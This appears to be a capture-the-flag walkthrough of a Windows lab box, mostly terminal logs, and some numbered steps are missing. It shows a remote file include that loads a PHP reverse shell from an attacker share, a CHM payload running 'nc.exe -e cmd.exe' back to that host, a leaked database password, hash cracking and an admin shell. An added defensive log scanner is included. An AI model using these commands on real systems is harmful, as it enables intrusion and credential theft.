```
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,139,445,49667 -sC -sV --min-rate=5000 10.10.10.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 00:15 CST
Nmap scan report for 10.10.10.151
Host is up (0.47s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.56 seconds
```
```
</html>
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
</body>
</html>
```
```
┌──(kali㉿offsec)-[~/Desktop]
└─$ curl -s -X GET 'http://10.10.10.151/blog/?lang=\\10.10.14.45\share\php_reverse_shell.php'
```
```
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.151] 49718
SOCKET: Shell has connected! PID: 340
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
```
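As an added, defender-side example (not part of the original writeup): a check for the `/blog/?lang=` include parameter abused by the request above, combining the allowlist that would have prevented the include with a scan of IIS W3C logs for values that are UNC shares, URLs or file paths. It assumes the default IIS W3C field order and a hypothetical allowlist of language codes; the log lines are constructed.

```python
"""Flag file-inclusion abuse of /blog/?lang= in IIS W3C logs (added example, not the writeup's code).
Assumes the default IIS W3C field order and a hypothetical language allowlist; log lines are constructed."""
import re
from urllib.parse import parse_qs

ALLOWED_LANGS = {"en", "es", "fr"}  # hypothetical: the only values the page should ever accept

# UNC share (\\host\share or //host/share) or any URL scheme: a remote include.
REMOTE = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.I)
# Absolute Windows/POSIX path or a traversal sequence: a local file include.
LOCAL = re.compile(r"^([a-z]:|[\\/])|(\.\./|\.\.\\)", re.I)

def is_safe_lang(value: str) -> bool:
    """Mitigation: the include target must come from a fixed allowlist, never from a path."""
    return value in ALLOWED_LANGS

def classify_lang(value: str) -> str:
    """Return 'ok', 'remote-include', 'local-path' or 'unknown' for one lang value."""
    if is_safe_lang(value):
        return "ok"
    if REMOTE.search(value):
        return "remote-include"
    if LOCAL.search(value):
        return "local-path"
    return "unknown"

def scan_iis_log(lines):
    """Return (client_ip, lang_value, verdict) for each /blog request whose lang is not allowlisted."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue  # skip directive lines such as #Fields:
        fields = line.split()
        if len(fields) < 9 or not fields[4].startswith("/blog"):
            continue
        for value in parse_qs(fields[5]).get("lang", []):  # parse_qs also %-decodes the value
            verdict = classify_lang(value)
            if verdict != "ok":
                hits.append((fields[8], value, verdict))
    return hits

# Constructed sample: a benign request, a local file read, and the UNC include from the writeup.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-05-28 06:20:01 10.10.10.151 GET /blog/ lang=es 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 15
2024-05-28 06:21:44 10.10.10.151 GET /blog/ lang=/windows/system32/drivers/etc/hosts 80 - 10.10.14.45 curl/8.5.0 - 200 0 0 31
2024-05-28 06:23:10 10.10.10.151 GET /blog/ lang=%5C%5C10.10.14.45%5Cshare%5Cphp_reverse_shell.php 80 - 10.10.14.45 curl/8.5.0 - 200 0 0 1204
""".splitlines()
```

Running `scan_iis_log(SAMPLE_LOG)` reports the two non-allowlisted requests from 10.10.14.45 with their verdicts, while the benign `lang=es` request is ignored.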
```
C:\inetpub\wwwroot>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\inetpub\wwwroot

04/11/2019  10:51 AM    <DIR>          .
04/11/2019  10:51 AM    <DIR>          ..
04/11/2019  05:23 AM    <DIR>          blog
04/11/2019  05:23 AM    <DIR>          css
04/11/2019  05:23 AM    <DIR>          images
04/11/2019  05:22 PM             2,635 index.php
04/11/2019  05:23 AM    <DIR>          js
04/11/2019  05:23 AM    <DIR>          scss
10/01/2019  08:44 AM    <DIR>          user
               1 File(s)          2,635 bytes
               8 Dir(s)   2,420,936,704 bytes free

C:\inetpub\wwwroot>cd user

C:\inetpub\wwwroot\user>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\inetpub\wwwroot\user

10/01/2019  08:44 AM    <DIR>          .
10/01/2019  08:44 AM    <DIR>          ..
04/11/2019  05:15 PM               108 auth.php
04/11/2019  05:52 AM    <DIR>          css
04/11/2019  10:51 AM               337 db.php
04/11/2019  05:23 AM    <DIR>          fonts
04/11/2019  05:23 AM    <DIR>          images
04/11/2019  06:18 AM             4,639 index.php
04/11/2019  05:23 AM    <DIR>          js
04/11/2019  06:10 AM             6,463 login.php
04/08/2019  11:04 PM               148 logout.php
10/01/2019  08:42 AM             7,192 registration.php
08/14/2019  10:35 PM             7,004 registration_old123123123847.php
04/11/2019  05:23 AM    <DIR>          vendor
               7 File(s)         25,891 bytes
               7 Dir(s)   2,420,936,704 bytes free

C:\inetpub\wwwroot\user>type db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
```
```
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\

10/01/2019  01:04 PM    <DIR>          Docs
04/09/2019  07:07 AM    <DIR>          inetpub
04/11/2019  06:44 AM    <DIR>          Microsoft
09/15/2018  12:19 AM    <DIR>          PerfLogs
04/29/2022  01:18 PM    <DIR>          Program Files
08/14/2019  10:38 PM    <DIR>          Program Files (x86)
04/11/2019  07:04 AM    <DIR>          Users
04/29/2022  01:19 PM    <DIR>          Windows
               0 File(s)              0 bytes
               8 Dir(s)   2,420,936,704 bytes free

C:\>cd Users

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\Users

04/11/2019  07:04 AM    <DIR>          .
04/11/2019  07:04 AM    <DIR>          ..
04/09/2019  06:47 AM    <DIR>          Administrator
04/11/2019  07:04 AM    <DIR>          Chris
04/09/2019  06:47 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   2,420,936,704 bytes free

C:\Users>net user Chris
User name                    Chris
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/11/2019 6:53:37 AM
Password expires             Never
Password changeable          4/11/2019 6:53:37 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/27/2024 9:22:41 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users
Global Group memberships     *None
The command completed successfully.
```
```
*Evil-WinRM* PS C:\Users\Chris\Desktop> cd C:/
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        10/1/2019   1:04 PM                Docs
d-----         4/9/2019   7:07 AM                inetpub
d-----        4/11/2019   6:44 AM                Microsoft
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        4/29/2022   1:18 PM                Program Files
d-----        8/14/2019  10:38 PM                Program Files (x86)
d-----        5/27/2024   1:35 PM                temp
d-r---        4/11/2019   7:04 AM                Users
d-----        4/29/2022   1:19 PM                Windows


*Evil-WinRM* PS C:\> cd Docs
*Evil-WinRM* PS C:\Docs> dir


    Directory: C:\Docs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf


*Evil-WinRM* PS C:\Docs> cat note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.
*Evil-WinRM* PS C:\Docs> download "php for dummies-trial.pdf"
Info: Downloading C:\Docs\dummies-trial.pdf to dummies-trial.pdf

Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Docs>
```
16. During enumeration I found a note; putting its hints together, the idea is evidently to get a file uploaded into that directory.

CHM (Compiled HTML Help) is the file extension for files that contain help documentation in a compiled format. CHM files are usually associated with Microsoft HTML Help, the proprietary online help format introduced with Windows 98.

17. A .chm file was also found in the user's Downloads directory.
```
*Evil-WinRM* PS C:\Docs> dir C:/Users/Chris/downloads


    Directory: C:\Users\Chris\downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:36 AM          10462 instructions.chm


Info: Uploading /home/kali/Desktop/Out-CHM.ps1 to C:\Docs\Out-CHM.ps1

Data: 26000 bytes of 26000 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Docs> dir


    Directory: C:\Docs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        5/27/2024   1:47 PM          19502 Out-CHM.ps1
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf


*Evil-WinRM* PS C:\Docs> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Docs> *Evil-WinRM* PS C:\Docs> Import-Module ./Out-CHM.ps1
*Evil-WinRM* PS C:\Docs> Out-CHM -Payload "\\10.10.14.45\share\nc.exe 10.10.14.45 53 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
The term 'C:\Program Files (x86)\HTML Help Workshop\hhc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Docs\Out-CHM.ps1:316 char:7
+     & "$HHC" "$OutputPath\doc.hhp"
+       ~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Program File...orkshop\hhc.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Docs>
```
20. Because of problems with the environment I could not be bothered to generate it again, so I simply followed the walkthrough report from here.

21. Now the password cracking begins.
```
❯ john -w:/usr/share/seclists/rockyou.txt hash
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
butterfly!#1     (Administrator)
1g 0:00:00:06 DONE (2024-01-01 22:26) 0.1620g/s 316659p/s 316659c/s 316659C/s byrd78..burlfire
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
```
Password:
[*] Requesting shares on 10.10.10.151.....
[*] Found writable share ADMIN$
[*] Uploading file CxHlLZHc.exe
[*] Opening SVCManager on 10.10.10.151.....
[*] Creating service Iqll on 10.10.10.151.....
[*] Starting service Iqll.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd C:/Users/administrator/Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is AE98-73A8

 Directory of C:\Users\Administrator\Desktop

03/22/2023  10:22 AM    <DIR>          .
03/22/2023  10:22 AM    <DIR>          ..
05/27/2024  08:08 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,398,326,784 bytes free

C:\Users\Administrator\Desktop> type root.txt
55f2bd84b8ecf828cca979ec066fe4ed
```